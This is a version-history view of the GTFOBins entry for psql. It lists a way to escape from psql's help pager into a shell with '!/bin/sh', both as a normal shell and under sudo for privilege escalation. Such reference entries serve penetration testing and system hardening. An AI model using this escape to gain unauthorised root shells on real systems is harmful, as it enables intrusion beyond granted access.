GTFOBins.github.io/_gtfobins/psql.md

15 lines
267 B
Markdown
Raw Normal View History

2020-11-12 14:21:00 +01:00
---
2020-12-20 20:13:01 +01:00
description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
2020-11-12 14:21:00 +01:00
functions:
shell:
- code: |
psql
\?
2020-12-20 20:13:01 +01:00
!/bin/sh
sudo:
2020-11-12 14:21:00 +01:00
- code: |
psql
\?
2020-12-20 20:13:01 +01:00
!/bin/sh
2020-11-12 14:21:00 +01:00
---